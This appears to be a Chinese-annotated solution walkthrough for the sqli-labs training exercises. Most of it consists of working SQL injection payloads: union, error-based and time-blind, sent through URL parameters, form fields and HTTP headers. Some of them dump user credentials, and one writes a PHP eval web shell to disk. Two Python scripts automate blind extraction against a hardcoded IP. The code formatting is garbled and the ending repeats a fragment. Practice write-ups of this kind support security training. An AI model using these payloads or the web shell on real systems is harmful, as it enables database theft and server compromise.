Less-1
?id=1' order by 3#正常
?id=1' order by 4#Unknown column '4' in 'order clause'
?id=666' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)--+# information_schema,challenges,mysql,performance_schema,security
?id=666' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 'security')--+# emails,referers,uagents,users
?id=666' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name = 'users')--+# id,username,password
?id=666' union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)--+# Dumb,Angelina, Dummy, secure,stupid, superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4# Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
Less-2# 方法同上,不过此题为数值查询
?id=666 union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)
Less-3
?id=666') union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)--+
Less-4
?id=666") union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)--+
Less-5# 页面没有显示位。无法使用联合查询注入 采用报错注入# and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
?id=1' and(select 1from(select count(*),concat(((select group_concat(schema_name)from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a)--+# Subquery returns more than 1 row
?id=1' and (select 1 from (select count(*),concat(((select concat(schema_name,';')from information_schema.schemata limit 4,1)),floor (rand(0)*2))x from information_schema.tables group by x)a)--+# Duplicate entry 'security;1' for key 'group_key'
?id=1' and (select 1 from (select count(*),concat(((select concat(table_name,";") from information_schema.tables where table_schema = 'security' limit 3,1)),floor (rand(0)*2))x from information_schema.tables group by x)a)--+# Duplicate entry 'users;1' for key 'group_key'# 以此类推
Less-6# 把'换成"
Less-7
?id=-1')) union select "<?php @eval($_POST['my']);?>" into outfile "path" --+# 一句话连上即可
Less-8# '))改为'
Less-9&10#区别是前者'后者"#经过测试发现本题是时间盲注,附上脚本:# coding:utf-8import requests
import datetime
defdatabase_len(url):# 获取数据库名长度for i inrange(1,10):
payload ='''?id=1' and if(length(database())>%s,sleep(1),0)'''% i
time1 = datetime.datetime.now()
r = requests.get(url + payload +'%23')
time2 = datetime.datetime.now()
sec =(time2 - time1).seconds
if sec >=1:print(i)else:print(i)breakprint('database_len:', i)return i
defdatabase_name(url, database_len):# 获取数据库名
name =''for j inrange(1, database_len +1):for i in'0123456789abcdefghijklmnopqrstuvwxyz':
payload ='''?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)'''%(
j, i)# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload +'%23')
time2 = datetime.datetime.now()
sec =(time2 - time1).seconds
if sec >=1:
name += i
print(name)breakprint('database_name:', name)
url ='''http://43.247.91.228:84/Less-9/'''
database_len = database_len(url)
database_name(url, database_len)#database_name: security
Less-11
?uname=' or '1'='1&passwd=1'union select 1,(select group_concat(schema_name)from information_schema.schemata)#&submit=Submit#' or '1'='1绕过
Less-12
?uname=") or ("1")=("1&passwd=1")union select 1,(select group_concat(schema_name)from information_schema.schemata)#&submit=Submit#") or ("1")=("1绕过
Less-13
?uname=1')and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))##>XPATH syntax error: ':security'
或者
?uname=1')and(select 1from(select count(*),concat(((select concat(schema_name," | ")from information_schema.schemata limit 4,1)),floor (rand(0)*2))x from information_schema.tables group by x)a)## Duplicate entry 'security | 1' for key 'group_key'
Less-14
把')换成"
Less-15#没有啥反应哈,试了试万能密码确定是',然后进行时间盲注,对之前的脚本做了个升级哈,这次是多线程# coding:utf-8import requests
import datetime
import threading
defdatabase_len(url, i):
postdata ={'uname':'''admin' and if(length(database())>%s,sleep(2),0) #'''% i,'passwd':'''1'''}
time1 = datetime.datetime.now()
r = requests.post(url, data=postdata)
time2 = datetime.datetime.now()
sec =(time2 - time1).seconds
if sec >=2:returnTrueelse:returnFalsedefdatabase_name(url, j):# 获取数据库名for i in'0123456789abcdefghijklmnopqrstuvwxyz':
postdata ={'uname':'''admin' and if(substr(database(),%d,1)='%s',sleep(2),1) #'''%(j, i),'passwd':'''1'''}# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.post(url, data=postdata)
time2 = datetime.datetime.now()
sec =(time2 - time1).seconds
if sec >=2:return i
classMyThread(threading.Thread):def__init__(self, func, args):
threading.Thread.__init__(self)
self.func = func
self.args = args
defgetresult(self):return self.res
defrun(self):
self.res = self.func(*self.args)defmain():
flag =True
url ='''http://43.247.91.228:84/Less-15/'''while flag:
threads =[]for i inrange(0,9):
t = MyThread(database_len,(url, i +1))
threads.append(t)
threads[i].start()for i inrange(0,9):
threads[i].join()ifnot threads[i].getresult():
flag =False
databaselength = i +1print('database_len:', databaselength)break
threads =[]
name =''for i inrange(0, databaselength):
t = MyThread(database_name,(url, i +1))
threads.append(t)
threads[i].start()for i inrange(0, databaselength):
threads[i].join()
name += threads[i].getresult()print("database_name :"+ name)if __name__ =='__main__':
main()#database_len: 8#database_name :security
Less-16
'改成")
Less-17#尝试了一会儿发现这里只有知道用户名才能进行注入哈,随便试了个admin发现可以,在密码发现有语法报错,于是采用报错注入
?uname=admin&passwd=1' and(select 1from(select count(*),concat(((select concat(schema_name," | ")from information_schema.schemata limit 4,1)),floor (rand(0)*2))x from information_schema.tables group by x)a)#&submit=Submit
Less-18#发现页面会返回ip和user-agent,改了下xxf发现不行呀,于是尝试在user-agent注入
User-Agent:1' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) and '1'='1# XPATH syntax error:':security'
Less-19#显示位在referer,所以尝试在这里注入
Referer:1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
uname=admin&passwd=admin&submit=Submit
#"security;1"
Less-20#在cookie里面注入
Cookie: uname=' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) and '1'='1
Less-1?id=1' order by 3#正常?id=1' order by 4#Unknown column '4' in 'order clause'?id=666' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+# information_sch...